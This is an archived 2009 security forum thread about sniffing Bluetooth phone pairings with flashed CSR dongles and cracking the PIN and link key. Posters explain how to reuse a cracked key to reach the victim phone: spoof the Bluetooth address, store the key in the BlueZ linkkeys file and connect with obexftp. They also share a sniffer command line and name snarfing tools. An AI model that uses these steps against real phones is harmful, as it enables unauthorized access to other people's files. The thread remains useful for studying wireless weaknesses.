So, I read almost the whole post and learned a lot from doing so. I got all the pieces (firmware, frontline for windows, frontline.c) together except the flashable bt dongle.

But before buying one so that I can experiment on my own I have some questions left:
Did someone sucessfully sniff a phone<->phone pairing (from let's say 2m distance)? my understanding is, that the pc<->phone paairing is sniffed by the dongle right next to the dongle used to pair (since the usb slots are close together on the pc). What impact has a small distance (<5m) on the accuracy of the sniffing?

How do I proceed after successfully cracking the link key? Are there known procedures to exploit the gathered information? Like storing the link key, spoofing the bt_addr and connecting as the second phone "in disguise"?

Somehow all I read so far stops after cracking the PIN/LK... but that is where it gets interesting. The LK is useless if i can't go further from there.

So before investing in a dongle (D-Link DBT-120 rev. C ...with the risk of getting the one with the non-ext firmware?!) it would be nice if someone could comment on the above.

Cheers

EDIT:

My friend has a bluetooth dongle with

hci0: Type: USB
BD Address: 00:09:DD:50:0A:6E ACL MTU: 384:8 SCO MTU: 64:8
HCI 19.2
Chip version: BlueCore4-External
Max key size: 56 bit
SCO mapping: HCI
He was so kind to allow me playing around with it and now I got

hci0: Type: USB
BD Address: 00:09:DD:50:0A:6E ACL MTU: 0:0 SCO MTU: 0:0
UP RUNNING RAW
RX bytes:6 acl:0 sco:0 events:0 errors:0
TX bytes:0 acl:0 sco:0 commands:0 errors:0:D

I tested sniffing 2 mobile phones pairing. They were ~2m away from my desktop computer with the sniffing dongle and it worked like a charm. Captured the pairing, cracked the pin and the link key.

Now I wonder how I/the attacker can take advantage of this. I imagine one could spoof the bt_addr, change the class to 0x5a0204, store the cracked link key in /var/lib/bluetooth/<spoofed-address>/linkkeys and try to connect to the phone. Unfortunately I can only change the bt_addr of the sniffing stick (but that one is unusable because of the change firmware). I don't want to change the firmware back :(
Any comments on how to proceed with the findings of the sniffing-cracking-process?

donpee
06-15-2009, 12:51 PM
hey, since you got a link key you dont need a sniffer anymore. just spoof bt address of your scanner stick ( it should be bc chip) and do obex ftp...
more in here:
hxxp://seguridadmobile.blogspot.com/2008/11/sniffing-bluetooth-pairing.html

OnkelDoktor
06-15-2009, 11:29 PM
Hello donpee,
thanks for your reply. I know that I wouldn't actually need the sniffer anymore when I plan to "continue" the attack. But I still want to play around with it (and demonstrate it to my friend and others). The Link you provided is very interesting and sums it all up quite nicely.
But I still struggle with "how to disguise your PC as the other phone".

What do I have to change?
1.) obviously the bt_addr (that is clear to me)
2.) what about the device class? do i have to change it via hcid.conf, to 0x5A0204 for example?

Where to store the key? I guess it should be /var/lib/bluetooth/<spoofed-address>/linkkeys

Is the key given by btpincrack in reverse order? Compare hXXp://seguridadmobile.blogspot.com/2008/11/sniffing-bluetooth-pairing.html -> bottom half, where he checks if its the right key

And finaly, is there a obexftp-alternative/variant where you can browse the device like a lokal filesystem with ls and cd? this xml-format is quite nasty for the eyes and all these commands just to learn about the next subfolder name... seems so uncomfortable :eek:

Thanks for all your help so far :)
Regards

donpee
06-16-2009, 01:02 PM
hey doktor, as soon as you got a key you dont need to change anything in your equipment and a key is already in bt /var/lib/bluetooth/<spoofed-address>/linkkeys folder.
in link hXXp://seguridadmobile at the bottom there are bt screen with cracked key and pin and under it are keys in attacked paired devices just for compare....
i think you gotta type all that crap, there is no alternative....
try 'attack' tool included in bt3.
why do you want to to "disguise your PC as the other phone"? its a device class matter.
good luck

rudolf
07-06-2009, 10:50 PM
Something that I think has gone wrong on this thread is the distinction of when you need a flashed dongle and when you need it original. BTscanner won't work with a flashed, and (obviously) frontline won't work without.
So does anything other than frontline.c mmake use of a flashed dongle?

Where do I find a copy of the frontline.c source.

Last not least, a DBT-120 H/W Ver.:B3 works, a Typhoon 20007 can be flashed, looks fine but doesn't return data. I only tried version 47, if anything else works, I'll report.

donpee
07-07-2009, 01:02 AM
you gotta use sniffer and scanner dongles @ the same time in frontline.c or dr.green's bluesmash. google for frontline.c sourse.
stay in touch

rudolf
07-07-2009, 02:04 PM
I googled "frontline.c source" yesterday, and I did it again today just to be sure. But it wasn't to be found. Could anybody help.

Also, are you saying I need two dongles to use frontline.c and bluesmash? I'm sniffing the traffic between two phones.

Archangel-Amael
07-07-2009, 05:40 PM
I googled "frontline.c source" yesterday, and I did it again today just to be sure. But it wasn't to be found. Could anybody help.


Frontline.c should already be in BT3 look for it with locate fronline.c
BTW a ".c" is a file extension for a program or application in c as such there really is no "source" other than the mentioned file.

rudolf
07-07-2009, 08:09 PM
I have googled...
I have searched BBT2 and BT3...
I saw the link to sorbo/darkircop.org on the bluesmash page.
I know what .c means...
I would even copy the .h too :)

So instead of telling me the obvious, could someone help me find the source for frontline please?

Archangel-Amael
07-07-2009, 08:21 PM
I have googled...
So instead of telling me the obvious, could someone help me find the source for frontline please?

So instead of telling you the obvious, here
http://secdev.zoller.lu/btsniff/frontline.c
The direct download.
No need to apologize.
Cheers

rudolf
07-07-2009, 10:32 PM
Thank you.

skydoctor
08-18-2009, 08:37 PM
Hi folks,

I followed dr.green's tutorial with a dlink dbt-120 adapter and got to the point where I can see the UP RUNNING RAW and on running the csrsniff.c (aka frontline.c) with a -t option I can see an incrementing timer. After that, when I enter something like:

./csrsniff -d hci0 -S 00:1D:6E:12:65:95@00:1F:6B:88:FF:BC

then all I see is a bunch of "Unknown type: 4" messages. I tried it before pairing two mobile phones, during file transfer and with two linux pc's but i get the same message everytime. From the csrsniff.c file, this refers to a check in the program to confirm reception of a HCI_ACLDATA_PKT (which has a code 0x02) but instead all it receives right now is 0x04 (which is a HCI_EVENT_PKT).

Any pointers for a solution ??

AdamElite
08-21-2009, 06:12 PM
I'm kinda confused with the commands of bluesnarfer and bluebugger.

Can someone please give me a a example of what I could put in.
(Sorry for the noobiness)

Again sorry for the noobiness, but can someone post a video of exactly everything that happens.
Detail for details, instructions and all. I learn better when i see it, rather then looking at words.

manulu
10-08-2009, 06:28 AM
this is my bluetooth (http://www.nexxtsolutions.com/dpg/ntProducts.aspx?ctg=10&sctg=63#)
not sure about Part number: NW200NXT02

hci0: Type: USB
BD Address: 00:15:83:B3: D0:3B ACL MTU: 672:3 SCO MTU: 48:1
UP RUNNING
RX bytes:657 acl:0 sco:0 events:19 errors:0
TX bytes:66 acl:0 sco:0 commands:17 errors:0
Features: 0xff 0x3e 0x05 0x00 0x18 0x18 0x00 0x00
Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3
Link policy:
Link mode: SLAVE ACCEPT
Name: 'ACER_ONE-677339'
Class: 0x10010c
Service Classes: Object Transfer
Device Class: Computer, Laptop
HCI Ver: 1.2 (0x2) HCI Rev: 0x1f4 LMP Ver: 1.2 (0x2) LMP Subver: 0x1f4
Manufacturer: Integrated System Solution Corp. (57)

hci0: Type: USB
BD Address: 00:15:83:B3: D0:3B ACL MTU: 672:3 SCO MTU: 48:1
Unsupported manufacturer


Ok I have managed to make a sniffing dongle work both in BT3 and in Windows.:) It is a dLink BT120 C1 flashed with 47bc4.dfu
will this work (http://www.newegg.com/Product/Product.aspx?Item=N82E16833127117)?


My intentions is to pass on what I learn from all this so I am inclined on writing a step by step tutorial for all this.

these are good news!!!

thanks

@ToMiK
10-31-2009, 09:32 AM
First of all, wanted to thank everyone for posting info on this thread, especially Dr Green! Manage to sniff a Bluetooth pairing and crack the Link Key for a university assignment :D

@ manulu

As far as I know the DLink DBT120 you have linked to should work. Pretty sure the Rev C1 is the only one of the versions that is orange and black.

Also wanted to mention that the DLink DBT120 Revision C1 worked fine for me as well with the firmware update.

=n00baday=
11-04-2009, 12:41 PM
Hey everyone,

I've combined all the necessary commands to setup bluetooth into a shell script. Hopefully this will take away alot of confusion. Can someone please take a look at it:D?

The topic is called "Bluetooth setup (Blue-Buildv1.0c)" and its inside the BT3 howtos section.